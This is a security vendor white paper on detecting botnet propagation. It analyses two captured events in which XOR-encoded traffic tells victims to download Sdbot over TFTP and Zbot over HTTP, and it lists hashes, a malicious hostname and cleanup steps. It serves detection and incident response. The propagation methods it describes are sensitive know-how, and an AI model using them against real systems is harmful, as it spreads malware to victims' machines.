Detecting Botnet Propagation
|
|
- Kerrie McCormick
- 8 years ago
- Views:
Transcription
1 Detecting Botnet Propagation How to confirm maliciousness
2 Table of Contents This paper describes techniques that should only be performed by qualified experts in a controlled and isolated environment. Any attempt to recreate or duplicate the descriptions are at your own risk. This white paper was written by: Tony Lee Principal Security Consultant McAfee Foundstone Professional Services The Environment...3 Initial Discovery...4 Tale of Two Events...5 Suspicious event 1 TFTP...5 Suspicious event 2 HTTP...9 Static and Dynamic Analysis...14 File information...14 Imports Registry keys...14 Files involved...14 DNS requests...14 What Now?...15 Conclusion...15 About the Author...15 About McAfee Foundstone Professional Services...16 Detecting Botnet Propagation 2
3 Discovering and triaging network nastiness can be tricky at times so it helps to have some tools and techniques to aid you in that task. This paper explains botnet propagation techniques uncovered during a recent investigation along with the tools and techniques used to quickly evaluate two separate events. From discovery to confirmation, it should not take more than 10 to 15 minutes per event if the proper environment is already established. Warning: Please take great care when surfing to or obtaining files from any of the addresses listed in this paper these programs are designed to spread quickly and maintain persistence. The Environment Detection and analysis environments can vary widely. The environment outlined in this paper was used to quickly triage events. Other devices can be substituted or added as necessary, but it may be helpful to explain our core detection and analysis setup. McAfee Global Threat Intelligence Internet URL Web File Network Signatures File Mismatch Internal Analysis Antivirus Shell Code McAfee Network Threat Response Stage 1 Samples Share [File Drop] Automated Analysis File Scan Encoding Analysis Engine ValidEdge Manual Analysis Stage 3 Analyst Analysis Share [Reports] Stage 2 Cuckoo Figure 1. The environment used to detect and quickly analyze the propagation outlined in this paper. The environment shown in Figure 1 is designed for rapid detection and triaging of events. Stage 1 of the environment leverages a McAfee Network Threat Response appliance part of the Intel Security product offering which captures traffic from the Internet and uses a series of internal criteria to determine maliciousness. It contains the following detection mechanisms: 1. Network signatures. 2. Antivirus definitions. 3. File reputation (McAfee Global Threat Intelligence). 4. IP and URL reputation (McAfee TrustedSource ) technology. 5. Static file analysis: a. Hidden information. b. Shellcode detection. c. Obfuscation detection. Detecting Botnet Propagation 3
4 McAfee Network Threat Response can be used to view the detection, raw traffic, decoded traffic, parties involved, and file metadata. If a file is determined to be malicious, McAfee Network Threat Response can alert the analyst to an event and send the carved file to an automated analysis engine, which performs static and dynamic analysis to produce an automated analysis report. The analyst can review the report and then make a decision as to whether further analysis is necessary. Since stage 3 analysis is a manual process performed by a human being, it is costly in time, money, and resources. Initial Discovery Finding malicious packets in a sea of packets is a difficult task. Fortunately, there are products that spend all of their CPU cycles looking for them. The product that we happen to have deployed is McAfee Network Threat Response. McAfee Network Threat Response dashboard notifies analysts of anomalies, as shown in Figure 2 below. While investigating shellcode detections, we ran across two unrelated, but very interesting, events. Figure 2. McAfee Network Threat Response dashboard. Detecting Botnet Propagation 4
5 Tale of Two Events What made the two suspicious events in the McAfee Network Threat Response dashboard most interesting is that they served up different bots and used different propagation techniques and protocols. Suspicious event 1 TFTP After clicking on the shellcode event, we see the session detail of the two hosts involved in the first incident: Source Host: XX.XXX Source Port: 1922 Destination Host: XX.XXX Destination Port: 135 Figure 3. Session details of the event after clicking on the dashboard indicator. In the session view shown above, McAfee Network Threat Response gives us the option to drill down and view the raw network traffic by clicking on the TCP hyperlink. The traffic was illegible in its raw form; however, McAfee Network Threat Response detected that it was XOR encoded with a static hex value of 0x13. From there, it was possible to leverage McAfee Network Threat Response s shellcode detector (shown in the screenshot below) to apply the key and decode the traffic. The decoded traffic revealed a TFTP file transfer request back to the suspected attacker s address for a file called host.exe. TFTP is a very common file transfer protocol used by attackers and worms to transfer additional files (such as hacking tools or malicious software) to and from a remote host. Detecting Botnet Propagation 5
6 Figure 4a. Detailed view of raw traffic and McAfee Network Threat Response decoded traffic. Raw traffic reveals a potential signature of MEOW and decoded traffic reveals the propagation mechanism. Figure 4b. Magnified view of raw and decoded traffic in Figure 4a. Oddly, within the raw encoded traffic, the string MEOW appears multiple times. This could be potentially used as a signature to detect this malicious traffic. To more easily explain the propagation method, we have diagrammed the events. Detecting Botnet Propagation 6
7 Figure 5. The first stage in the propagation. The diagram above depicts the attacker remotely issuing the TFTP command to the victim. This command will be executed on the victim s system, which communicates back to the attacker s system to obtain the host.exe file (as shown in the Figure 6 diagram). Figure 6. The resulting transfer. Detecting Botnet Propagation 7
8 So what is this host.exe? It doesn t sound too bad, right? Running the MD5 hash through VirusTotal.com confirmed our suspicions that this is an undesirable file. Figure 7. Results of running the hash through VirusTotal. It appears that it is an Internet worm (Win32/Sdbot) that spreads through weak Microsoft Windows credentials on network shares. According to McAfee Labs, this worm has the following characteristics: Exploits the MS vulnerability. Provides a backdoor to the victim machine, thereby compromising data on that machine (significant remote access functionality is available to the hacker). Propagates to machines with poorly secured network shares (weak username/password combinations) or accessible share (where local credentials are sufficient to write files to other systems). Propagates to remote machines (it generates random IPs) by attempting to copy itself to a number of shares. The bot also listens locally on a random high TCP port, as well as UDP port 69 (presumably for use in TFTP callback attacks). Analysis suggests the bot provides its author with extensive control functions such as downloading additional software or updates, control and reporting for further spreading, reporting host system characteristics, and others. Source: Detecting Botnet Propagation 8
9 Suspicious event 2 HTTP A second, believed-to-be-unrelated event was also detected and the session details are shown below: Source Host: XX.XXX Source Port: Destination Host: XX.XX Destination Port: 445 Figure 8. Session details after clicking on the dashboard show the hosts and ports involved. Detecting Botnet Propagation 9
10 Inspecting the raw traffic of this session yields more encoded traffic this time XOR d with the static key of 0x85. When decoded, it appears that the attacker is issuing an HTTP request to a third-party server hosting the dd.exe file. Figure 9a. Decoded suspicious traffic yields an HTTP request. Figure 9b. Magnified view of raw and decoded traffic in Figure 9a. Detecting Botnet Propagation 10
11 A WHOIS query using DomainTools.com shows that the server hosting the file is registered in Russia. Figure 10. Contact details for the organization that registered the web server that is hosting our malicious dd.exe. We have once again diagrammed the attacker-to-victim communication to more easily explain the propagation method. Figure 11. The first stage in the propagation. The image above shows the initial communication with the host. The attacker instructs the victim to make a request to a web server at hxxp:// to obtain the dd.exe executable. The victim then downloads the file, as shown in Figure 12. Detecting Botnet Propagation 11
12 Figure 12. Diagram shows the victim reaching out to the Russian malware repository in order to grab dd.exe. The name, dd.exe, is a commonly used name for the Windows port of the *nix disk copy tool, however upon inspection, it was determined that the executable hosted within the malware repository was not this tool. The file was then sent to VirusTotal.com to determine if a known signature could be found. Figure 13. At the time, VirusTotal showed 21 out of 46 virus engines detected this malware. Detecting Botnet Propagation 12
13 VirusTotal.com identified the dd.exe file as a known malicious file. McAfee classified this particular variant as PWS-Zbot.gen.arj. According to McAfee Labs, there is antivirus coverage in a.dat file, and the malware proliferation is heaviest in Russia. This information seems to reinforce our findings. Figure 14. McAfee Labs heat map showing the proliferation of zbot. Detecting Botnet Propagation 13
14 Static and Dynamic Analysis Cuckoo Sandbox was used to further analyze the host.exe and dd.exe binaries. Cuckoo Sandbox is an extremely powerful tool available as part of the NTR CADS framework used for stage-two automated analysis. Just a sample of the stage-two analysis is shown below on dd.exe. File information File Name File Size File Type CRC32 MD5 SHA1 SHA256 dd.exe bytes PE32 executable (GUI) Intel 80386, for MS Windows AFAB5FC6 00c713ad2f0b189db600dfdc730b5034 7b9e1c5e95538c48a4a16ca2fdf90a9cdbe3a466 f116b4fba18b5b12f04b4b0d31df7701bac1440d9e82659be258efaf3fbd8808 Imports Library KERNEL32.dll: DNS requests Hostname tv.zabetwo.com 0x ExitProcess 0x VirtualFree 0x lstrcmpw 0x40700c - MultiByteToWideChar 0x GetCommandLineA 0x HeapSetInformation 0x GetStartupInfoW 0x40701c - TerminateProcess 0x GetCurrentProcess 0x UnhandledExceptionFilter 0x SetUnhandledExceptionFilter 0x40702c - IsDebuggerPresent 0x GetProcAddress 0x GetModuleHandleW 0x DecodePointer 0x40703c - WriteFile 0x GetStdHandle 0x GetModuleFileNameW 0x GetModuleFileNameA 0x40704c - FreeEnvironmentStringsW 0x WideCharToMultiByte 0x GetEnvironmentStringsW 0x SetHandleCount 0x40705c - InitializeCriticalSectionAndSpinCount 0x GetFileType 0x DeleteCriticalSection 0x EncodePointer 0x40706c - TlsAlloc 0x TlsGetValue 0x TlsSetValue 0x TlsFree 0x40707c - InterlockedIncrement 0x SetLastError 0x GetCurrentThreadId 0x GetLastError 0x40708c - InterlockedDecrement 0x HeapCreate 0x QueryPerformanceCounter 0x GetTickCount 0x40709c - GetCurrentProcessId 0x4070a0 - GetSystemTimeAsFileTime 0x4070a4 - LeaveCriticalSection 0x4070a8 - EnterCriticalSection 0x4070ac - LoadLibraryW 0x4070b0 - GetCPInfo 0x4070b4 - GetACP 0x4070b8 - GetOEMCP 0x4070bc - IsValidCodePage 0x4070c0 - HeapFree 0x4070c4 - Sleep 0x4070c8 - RtlUnwind 0x4070cc - HeapSize 0x4070d0 - LCMapStringW 0x4070d4 - GetStringTypeW 0x4070d8 - HeapAlloc 0x4070dc - HeapReAlloc 0x4070e0 - IsProcessorFeaturePresent Registry keys HKEY_LOCAL_MACHINE\SYSTEM\ Setup Files involved C:\ C:\analyzer\ C:\WINDOWS\system32\shell32.dll C:\WINDOWS\system32\shell32. dll.124.manifest C:\WINDOWS\system32\shell32. dll.124.config Detecting Botnet Propagation 14
15 What Now? At this point, since we have confirmed that these files are malicious, we need to do some clean up. Using McAfee Network Threat Response session analysis, we can pivot around the attacking host and see all of the other hosts that were potentially compromised through communication with the infected host. If the host falls under our administration, we can have it removed from the network and re-imaged. Otherwise, if the host is out of our administrative control, we may block communication to the infected host. To prevent further outbreak, a review of policies and procedures should take place to address the root cause of the infection and propagation. Conclusion This traffic is difficult to detect and analyze without the proper people, processes, and technology in place. You don t necessarily need to do reverse engineering; however, it is helpful to be able to do first- and second-stage triaging in order to gain perspective on the sophistication and damage that is constantly knocking at the door. Utilizing a tool like McAfee Network Threat Response can give you an immediate starting point for your investigation and take a significant amount of analysis and condense it down to a few minutes. About the Author Tony Lee has more than eight years of professional experience pursuing his passion in all areas of information security. He is a principal security consultant at McAfee Foundstone Professional Services part of the Intel Security product and service offering in charge of advancing many of the network penetration service lines. His interests include Citrix and kiosk hacking, post exploitation, and SCADA exploitation. As an avid educator, Tony has instructed thousands of students at many venues worldwide, including government, universities, corporations, and conferences such as Black Hat. He takes every opportunity to share knowledge as a contributing author to Hacking Exposed 7 and was a lead instructor for a series of classes that includes McAfee Foundstone s Ultimate Hacking (UH), UH: Windows, UH: Expert, UH: Wireless, and UH: Web. He holds a bachelor of science in computer engineering from Virginia Polytechnic Institute and State University and a master of science in security informatics from The Johns Hopkins University. Detecting Botnet Propagation 15
16 About McAfee Foundstone Professional Services McAfee Foundstone Professional Services, a division of McAfee, part of Intel Security, offers expert services and education to help organizations continuously and measurably protect their most important assets from the most critical threats. Through a strategic approach to security, McAfee Foundstone identifies and implements the right balance of technology, people, and process to manage digital risk and leverage security investments more effectively. The company s professional services team consists of recognized security experts and authors with broad security experience with multinational corporations, the public sector, and the US military. About Intel Security McAfee is now part of Intel Security. With its Security Connected strategy, innovative approach to hardware-enhanced security, and unique Global Threat Intelligence, Intel Security is intensely focused on developing proactive, proven security solutions and services that protect systems, networks, and mobile devices for business and personal use around the world. Intel Security is combining the experience and expertise of McAfee with the innovation and proven performance of Intel to make security an essential ingredient in every architecture and on every computing platform. Intel Security s mission is to give everyone the confidence to live and work safely and securely in the digital world. McAfee. Part of Intel Security Mission College Boulevard Santa Clara, CA Intel and the Intel logo are registered trademarks of the Intel Corporation in the US and/or other countries. McAfee, the McAfee logo, Foundstone, and TrustedSource are registered trademarks or trademarks of McAfee, Inc. or its subsidiaries in the US and other countries. Other marks and brands may be claimed as the property of others. The product plans, specifications and descriptions herein are provided for information only and subject to change without notice, and are provided without warranty of any kind, express or implied. Copyright 2013 McAfee, Inc wp_botnet-prop_0113B_ETMG
Getting Ahead of Malware
IT@Intel White Paper Intel Information Technology Security December 2009 Getting Ahead of Malware Executive Overview Since implementing our security event monitor and detection processes two years ago,
More informationTechnology Blueprint. Protect Your Email Servers. Guard the data and availability that enable business-critical communications
Technology Blueprint Protect Your Email Servers Guard the data and availability that enable business-critical communications LEVEL 1 2 3 4 5 SECURITY CONNECTED REFERENCE ARCHITECTURE LEVEL 1 2 4 5 3 Security
More informationMcAfee Global Threat Intelligence File Reputation Service. Best Practices Guide for McAfee VirusScan Enterprise Software
McAfee Global Threat Intelligence File Reputation Service Best Practices Guide for McAfee VirusScan Enterprise Software Table of Contents McAfee Global Threat Intelligence File Reputation Service McAfee
More informationMcAfee Endpoint Protection for SMB. You grow your business. We keep it secure.
McAfee Endpoint Protection for SMB You grow your business. We keep it secure. Big Protection for Small to Medium-Sized Businesses With the Internet and connected devices now an integral part of your business,
More informationComparison of Firewall, Intrusion Prevention and Antivirus Technologies
White Paper Comparison of Firewall, Intrusion Prevention and Antivirus Technologies How each protects the network Juan Pablo Pereira Technical Marketing Manager Juniper Networks, Inc. 1194 North Mathilda
More informationAutomating Linux Malware Analysis Using Limon Sandbox Monnappa K A monnappa22@gmail.com
Automating Linux Malware Analysis Using Limon Sandbox Monnappa K A monnappa22@gmail.com A number of devices are running Linux due to its flexibility and open source nature. This has made Linux platform
More informationWhite Paper. PCI Guidance: Microsoft Windows Logging
PCI Guidance: Microsoft Windows Logging Table of Contents Introduction...3 This white paper was written by: Cayce Beames, CISSP, QSA, Technical Practice Director, Strategic Services, Intel Security Preparation
More informationMcAfee Web Reporter Turning volumes of data into actionable intelligence
McAfee Web Reporter Turning volumes of data into actionable intelligence Business today is more Internet-dependent than ever before. From missioncritical services to productivity tools, Internet access
More informationComprehensive Malware Detection with SecurityCenter Continuous View and Nessus. February 3, 2015 (Revision 4)
Comprehensive Malware Detection with SecurityCenter Continuous View and Nessus February 3, 2015 (Revision 4) Table of Contents Overview... 3 Malware, Botnet Detection, and Anti-Virus Auditing... 3 Malware
More informationTechnology Blueprint. Secure Your Virtual Desktop Infrastructure. Optimize your virtual desktop infrastructure for performance and protection
Technology Blueprint Secure Your Virtual Desktop Infrastructure Optimize your virtual desktop infrastructure for performance and protection LEVEL 1 2 3 4 5 SECURITY CONNECTED REFERENCE ARCHITECTURE LEVEL
More informationUnknown threats in Sweden. Study publication August 27, 2014
Unknown threats in Sweden Study publication August 27, 2014 Executive summary To many international organisations today, cyber attacks are no longer a matter of if but when. Recent cyber breaches at large
More informationWildFire. Preparing for Modern Network Attacks
WildFire WildFire automatically protects your networks from new and customized malware across a wide range of applications, including malware hidden within SSL-encrypted traffic. WildFire easily extends
More informationNetworks and Security Lab. Network Forensics
Networks and Security Lab Network Forensics Network Forensics - continued We start off from the previous week s exercises and analyze each trace file in detail. Tools needed: Wireshark and your favorite
More informationWhite Paper. Emergency Incident Response: 10 Common Mistakes of Incident Responders
Emergency Incident Response: 10 Common Mistakes of Incident Responders Table of Contents This white paper was written by: Michael G. Spohn Principal Consultant McAfee Foundstone Professional Services Incident
More information24/7 Visibility into Advanced Malware on Networks and Endpoints
WHITEPAPER DATA SHEET 24/7 Visibility into Advanced Malware on Networks and Endpoints Leveraging threat intelligence to detect malware and exploitable vulnerabilities Oct. 24, 2014 Table of Contents Introduction
More informationMcAfee Next Generation Firewall Optimize your defense, resilience, and efficiency.
Optimize your defense, resilience, and efficiency. Table of Contents Need Stronger Network Defense? Network Concerns Security Concerns Cost of Ownership Manageability Application and User Awareness High
More informationProtecting the Infrastructure: Symantec Web Gateway
Protecting the Infrastructure: Symantec Web Gateway 1 Why Symantec for Web Security? Flexibility and Choice Best in class hosted service, appliance, and virtual appliance (upcoming) deployment options
More informationAgenda. Taxonomy of Botnet Threats. Background. Summary. Background. Taxonomy. Trend Micro Inc. Presented by Tushar Ranka
Taxonomy of Botnet Threats Trend Micro Inc. Presented by Tushar Ranka Agenda Summary Background Taxonomy Attacking Behavior Command & Control Rallying Mechanisms Communication Protocols Evasion Techniques
More informationUNMASKCONTENT: THE CASE STUDY
DIGITONTO LLC. UNMASKCONTENT: THE CASE STUDY The mystery UnmaskContent.com v1.0 Contents I. CASE 1: Malware Alert... 2 a. Scenario... 2 b. Data Collection... 2 c. Data Aggregation... 3 d. Data Enumeration...
More informationThe Value of QRadar QFlow and QRadar VFlow for Security Intelligence
BROCHURE The Value of QRadar QFlow and QRadar VFlow for Security Intelligence As the security threats facing organizations have grown exponentially, the need for greater visibility into network activity
More informationSECURITY ANALYTICS MOVES TO REAL-TIME PROTECTION
SECURITY ANALYTICS MOVES TO REAL-TIME PROTECTION How ThreatBLADES add real-time threat scanning and alerting to the Analytics Platform INTRODUCTION: analytics solutions have become an essential weapon
More informationMcAfee. Firewall Enterprise. Application Note TrustedSource in McAfee. Firewall Enterprise. version 8.1.0 and earlier
Application Note TrustedSource in McAfee Firewall Enterprise McAfee version 8.1.0 and earlier Firewall Enterprise This document uses a question and answer format to explain the TrustedSource reputation
More informationWHITE PAPER Cloud-Based, Automated Breach Detection. The Seculert Platform
WHITE PAPER Cloud-Based, Automated Breach Detection The Seculert Platform Table of Contents Introduction 3 Automatic Traffic Log Analysis 4 Elastic Sandbox 5 Botnet Interception 7 Speed and Precision 9
More informationCisco Advanced Malware Protection for Endpoints
Data Sheet Cisco Advanced Malware Protection for Endpoints Product Overview With today s sophisticated malware, you have to protect endpoints before, during, and after attacks. Cisco Advanced Malware Protection
More informationHow Lastline Has Better Breach Detection Capabilities. By David Strom December 2014 david@strom.com
How Lastline Has Better Breach Detection Capabilities By David Strom December 2014 david@strom.com The Internet is a nasty place, and getting nastier. Current breach detection products using traditional
More informationNorton Personal Firewall for Macintosh
Norton Personal Firewall for Macintosh Evaluation Guide Firewall Protection for Client Computers Corporate firewalls, while providing an excellent level of security, are not always enough protection for
More informationBypassing CAPTCHAs by Impersonating CAPTCHA Providers
White Paper Bypassing CAPTCHAs by Impersonating CAPTCHA Providers Gursev Singh Kalra, Principal Consultant McAfee Foundstone Professional Services Table of Contents Inside a CAPTCHA Provider Integration
More informationWildFire Reporting. WildFire Administrator s Guide 55. Copyright 2007-2015 Palo Alto Networks
WildFire Reporting When malware is discovered on your network, it is important to take quick action to prevent spread of the malware to other systems. To ensure immediate alerts to malware discovered on
More informationBotnet Analysis Leveraging Domain Ratio Analysis Uncovering malicious activity through statistical analysis of web log traffic
The Leader in Cloud Security RESEARCH REPORT Botnet Analysis Leveraging Domain Ratio Analysis Uncovering malicious activity through statistical analysis of web log traffic ABSTRACT Zscaler is a cloud-computing,
More informationSecurity strategies to stay off the Børsen front page
Security strategies to stay off the Børsen front page Steve Durkin, Channel Director for Europe, Q1 Labs, an IBM Company 1 2012 IBM Corporation Given the dynamic nature of the challenge, measuring the
More informationCloud Security Primer MALICIOUS NETWORK COMMUNICATIONS: WHAT ARE YOU OVERLOOKING?
A Cloud Security Primer : WHAT ARE YOU OVERLOOKING? LEGAL DISCLAIMER The information provided herein is for general information and educational purposes only. It is not intended and should not be construed
More informationADVANCED THREATS IN THE ENTERPRISE. Finding an Evil in the Haystack with RSA ECAT. White Paper
ADVANCED THREATS IN THE ENTERPRISE Finding an Evil in the Haystack with RSA ECAT White Paper With thousands of workstations and servers under management, most enterprises have no way to effectively make
More informationFighting Advanced Threats
Fighting Advanced Threats With FortiOS 5 Introduction In recent years, cybercriminals have repeatedly demonstrated the ability to circumvent network security and cause significant damages to enterprises.
More informationMcAfee Server Security
Security Secure server workloads with low performance impact and integrated management efficiency. Suppose you had to choose between securing all the servers in your data center physical and virtual or
More informationSeven Requirements for Hybrid Web Delivery Getting the best of both on-premises and SaaS
Seven Requirements for Hybrid Web Delivery Getting the best of both on-premises and SaaS Traditionally, IT risk management has balanced security investment and the impact of the threat, allowing each business
More informationConcierge SIEM Reporting Overview
Concierge SIEM Reporting Overview Table of Contents Introduction... 2 Inventory View... 3 Internal Traffic View (IP Flow Data)... 4 External Traffic View (HTTP, SSL and DNS)... 5 Risk View (IPS Alerts
More informationSymantec Cyber Threat Analysis Program Program Overview. Symantec Cyber Threat Analysis Program Team
Symantec Cyber Threat Analysis Program Symantec Cyber Threat Analysis Program Team White Paper: Symantec Security Intelligence Services Symantec Cyber Threat Analysis Program Contents Overview...............................................................................................
More informationIBM Security QRadar QFlow Collector appliances for security intelligence
IBM Software January 2013 IBM Security QRadar QFlow Collector appliances for security intelligence Advanced solutions for the analysis of network flow data 2 IBM Security QRadar QFlow Collector appliances
More informationHow To Mitigate A Ddos Attack
VERISIGN DISTRIBUTED DENIAL OF SERVICE TRENDS REPORT ISSUE 3 3RD QUARTER 2014 CONTENTS EXECUTIVE SUMMARY 3 VERISIGN-OBSERVED DDoS ATTACK TRENDS 4 Mitigations by Attack Size 4 Mitigations by Industry 5
More informationHackers: Detection and Prevention
Computer Networks & Computer Security SE 4C03 Project Report Hackers: Detection and Prevention Due Date: March 29 th, 2005 Modified: March 28 th, 2005 Student Name: Arnold Sebastian Professor: Dr. Kartik
More informationOperation Liberpy : Keyloggers and information theft in Latin America
Operation Liberpy : Keyloggers and information theft in Latin America Diego Pérez Magallanes Malware Analyst Pablo Ramos HEAD of LATAM Research Lab 7/7/2015 version 1.1 Contents Introduction... 3 Operation
More informationComputer Networks & Computer Security
Computer Networks & Computer Security Software Engineering 4C03 Project Report Hackers: Detection and Prevention Prof.: Dr. Kartik Krishnan Due Date: March 29 th, 2004 Modified: April 7 th, 2004 Std Name:
More informationComprehensive Advanced Threat Defense
1 Comprehensive Advanced Threat Defense June 2014 PAGE 1 PAGE 1 1 INTRODUCTION The hot topic in the information security industry these days is Advanced Threat Defense (ATD). There are many definitions,
More informationCisco Advanced Malware Protection for Endpoints
Data Sheet Cisco Advanced Malware Protection for Endpoints Product Overview With today s sophisticated malware, you have to protect endpoints before, during, and after attacks. Cisco Advanced Malware Protection
More informationRadware Security Research. Reverse Engineering a Sophisticated DDoS Attack Bot. Author: Zeev Ravid
Reverse Engineering a Sophisticated DDoS Attack Bot Author: Zeev Ravid July 2015 Introduction In July 2015, Radware s Emergency Response Team (ERT) noticed a significant increased usage of the Tsunami
More informationIBM Advanced Threat Protection Solution
IBM Advanced Threat Protection Solution Fabio Panada IBM Security Tech Sales Leader 1 Advanced Threats is one of today s key mega-trends Advanced Threats Sophisticated, targeted attacks designed to gain
More informationNetworking for Caribbean Development
Networking for Caribbean Development BELIZE NOV 2 NOV 6, 2015 w w w. c a r i b n o g. o r g N E T W O R K I N G F O R C A R I B B E A N D E V E L O P M E N T BELIZE NOV 2 NOV 6, 2015 w w w. c a r i b n
More informationMcAfee Network Security Platform Administration Course
McAfee Network Security Platform Administration Course Intel Security Education Services Administration Course The McAfee Network Security Platform Administration course from McAfee Education Services
More informationMcAfee Security Architectures for the Public Sector
White Paper McAfee Security Architectures for the Public Sector End-User Device Security Framework Table of Contents Business Value 3 Agility 3 Assurance 3 Cost reduction 4 Trust 4 Technology Value 4 Speed
More informationThe Advanced Attack Challenge. Creating a Government Private Threat Intelligence Cloud
The Advanced Attack Challenge Creating a Government Private Threat Intelligence Cloud The Advanced Attack Challenge One of the most prominent and advanced threats to government networks is advanced delivery
More informationCovert Operations: Kill Chain Actions using Security Analytics
Covert Operations: Kill Chain Actions using Security Analytics Written by Aman Diwakar Twitter: https://twitter.com/ddos LinkedIn: http://www.linkedin.com/pub/aman-diwakar-ccie-cissp/5/217/4b7 In Special
More informationEmail David-Kovarik@northwestern.edu Phone 847-467-5930 Fax 847-467-6000
Information Technology Information and Systems Security/Compliance Northwestern University 1800 Sherman Av Suite 209 Evanston, IL 60201 Email David-Kovarik@northwestern.edu Phone 847-467-5930 Fax 847-467-6000
More informationMcAfee Web Gateway Administration Intel Security Education Services Administration Course Training
McAfee Web Gateway Administration Intel Security Education Services Administration Course Training The McAfee Web Gateway Administration course from Education Services provides an in-depth introduction
More informationIntroducing IBM s Advanced Threat Protection Platform
Introducing IBM s Advanced Threat Protection Platform Introducing IBM s Extensible Approach to Threat Prevention Paul Kaspian Senior Product Marketing Manager IBM Security Systems 1 IBM NDA 2012 Only IBM
More informationThe Dirty Secret Behind the UTM: What Security Vendors Don t Want You to Know
The Dirty Secret Behind the UTM: What Security Vendors Don t Want You to Know I n t r o d u c t i o n Until the late 1990s, network security threats were predominantly written by programmers seeking notoriety,
More informationAnalyzing HTTP/HTTPS Traffic Logs
Advanced Threat Protection Automatic Traffic Log Analysis APTs, advanced malware and zero-day attacks are designed to evade conventional perimeter security defenses. Today, there is wide agreement that
More informationDirect or Transparent Proxy?
Direct or Transparent Proxy? Choose the right configuration for your gateway. Table of Contents Direct Proxy...3 Transparent Proxy...4 Other Considerations: Managing authentication made easier.....4 SSL
More informationBreach Found. Did It Hurt?
ANALYST BRIEF Breach Found. Did It Hurt? INCIDENT RESPONSE PART 2: A PROCESS FOR ASSESSING LOSS Authors Christopher Morales, Jason Pappalexis Overview Malware infections impact every organization. Many
More informationProtecting Your Organisation from Targeted Cyber Intrusion
Protecting Your Organisation from Targeted Cyber Intrusion How the 35 mitigations against targeted cyber intrusion published by Defence Signals Directorate can be implemented on the Microsoft technology
More informationUnified Security, ATP and more
SYMANTEC Unified Security, ATP and more TAKE THE NEXT STEP Martin Werner PreSales Consultant, Symantec Switzerland AG MEET SWISS INFOSEC! 27.01.2016 Unified Security 2 Symantec Enterprise Security Users
More informationRSA Enterprise Compromise Assessment Tool (ECAT) Date: January 2014 Authors: Jon Oltsik, Senior Principal Analyst and Tony Palmer, Senior Lab Analyst
ESG Lab Review RSA Enterprise Compromise Assessment Tool (ECAT) Date: January 2014 Authors: Jon Oltsik, Senior Principal Analyst and Tony Palmer, Senior Lab Analyst Abstract: This ESG Lab review documents
More informationMcAfee Labs Threat Advisory W32/Autorun.worm.aaeb-h
Summary McAfee Labs Threat Advisory W32/Autorun.worm.aaeb-h August 9, 2013 W32/Autorun.worm.aaeb-h has the ability to infect removable media devices, as well as mounted network shares. Infection starts
More informationIntroduction: 1. Daily 360 Website Scanning for Malware
Introduction: SiteLock scans your website to find and fix any existing malware and vulnerabilities followed by using the protective TrueShield firewall to keep the harmful traffic away for good. Moreover
More informationMcAfee Certified Assessment Specialist Network
McAfee Certified Assessment Specialist Network Exam preparation guide Table of Contents Introduction 3 Becoming McAfee Certified 3 Exam Details 4 Recommended Exam Preparation 4 Exam Objectives 4 Sample
More informationHow McAfee Endpoint Security Intelligently Collaborates to Protect and Perform
How McAfee Endpoint Security Intelligently Collaborates to Protect and Perform McAfee Endpoint Security 10 provides customers with an intelligent, collaborative framework, enabling endpoint defenses to
More informationManaging Latency in IPS Networks
Application Note Revision B McAfee Network Security Platform Managing Latency in IPS Networks Managing Latency in IPS Networks McAfee Network Security Platform provides you with a set of pre-defined recommended
More informationIntel Security Certified Product Specialist Security Information Event Management (SIEM)
Intel Security Certified Product Specialist Security Information Event Management (SIEM) Why Get Intel Security Certified? As technology and security threats continue to evolve, organizations are looking
More informationA New Approach to Assessing Advanced Threat Solutions
A New Approach to Assessing Advanced Threat Solutions December 4, 2014 A New Approach to Assessing Advanced Threat Solutions How Well Does Your Advanced Threat Solution Work? The cyber threats facing enterprises
More informationIntrusion Detection in AlienVault
Complete. Simple. Affordable Copyright 2014 AlienVault. All rights reserved. AlienVault, AlienVault Unified Security Management, AlienVault USM, AlienVault Open Threat Exchange, AlienVault OTX, Open Threat
More informationNetwork Security Monitoring and Behavior Analysis Pavel Čeleda, Petr Velan, Tomáš Jirsík
Network Security Monitoring and Behavior Analysis Pavel Čeleda, Petr Velan, Tomáš Jirsík {celeda velan jirsik}@ics.muni.cz Part I Introduction P. Čeleda et al. Network Security Monitoring and Behavior
More informationDetecting peer-to-peer botnets
Detecting peer-to-peer botnets Reinier Schoof & Ralph Koning System and Network Engineering University of Amsterdam mail: reinier.schoof@os3.nl, ralph.koning@os3.nl February 4, 2007 1 Introduction Spam,
More informationWhite Paper. McAfee Multi-Link. Always-on connectivity with significant savings
McAfee Multi-Link Always-on connectivity with significant savings Table of Contents Executive Summary...3 How McAfee Multi-Link Works...4 Outbound traffic...4 Load balancing...4 Standby links for high
More informationCombating Advanced Persistent Threats
White Paper How to prevent, detect, and remediate APTs Table of Contents Targeted Attacks Are on the Rise 3 What Is an APT? 4 Stages of a Targeted Attack 4 Early-Stage APT Detection and Prevention 5 Late-Stage
More informationMcAfee Phishing Quiz. Partner Enablement Guide
McAfee Phishing Quiz Partner Enablement Guide Use the Phishing Quiz to educate your own organization, prospects, and existing customers about phishing and how McAfee security solutions can help. This guide
More informationWhite Paper. Why Next-Generation Firewalls Don t Stop Advanced Malware and Targeted APT Attacks
White Paper Why Next-Generation Firewalls Don t Stop Advanced Malware and Targeted APT Attacks White Paper Executive Summary Around the world, organizations are investing massive amounts of their budgets
More informationCisco Security Intelligence Operations
Operations Operations of 1 Operations Operations of Today s organizations require security solutions that accurately detect threats, provide holistic protection, and continually adapt to a rapidly evolving,
More informationSPEAR PHISHING AN ENTRY POINT FOR APTS
SPEAR PHISHING AN ENTRY POINT FOR APTS threattracksecurity.com 2015 ThreatTrack, Inc. All rights reserved worldwide. INTRODUCTION A number of industry and vendor studies support the fact that spear phishing
More informationRSA Security Analytics
RSA Security Analytics This is what SIEM was Meant to Be 1 The Original Intent of SIEM Single compliance & security interface Compliance yes, but security? Analyze & prioritize alerts across various sources
More informationApplying machine learning techniques to achieve resilient, accurate, high-speed malware detection
White Paper: Applying machine learning techniques to achieve resilient, accurate, high-speed malware detection Prepared by: Northrop Grumman Corporation Information Systems Sector Cyber Solutions Division
More informationAlienVault. Unified Security Management (USM) 5.x Policy Management Fundamentals
AlienVault Unified Security Management (USM) 5.x Policy Management Fundamentals USM 5.x Policy Management Fundamentals Copyright 2015 AlienVault, Inc. All rights reserved. The AlienVault Logo, AlienVault,
More informationZscaler Cloud Web Gateway Test
Zscaler Cloud Web Gateway Test A test commissioned by Zscaler, Inc. and performed by AV-TEST GmbH. Date of the report: April15 th, 2016 Executive Summary In March 2016, AV-TEST performed a review of the
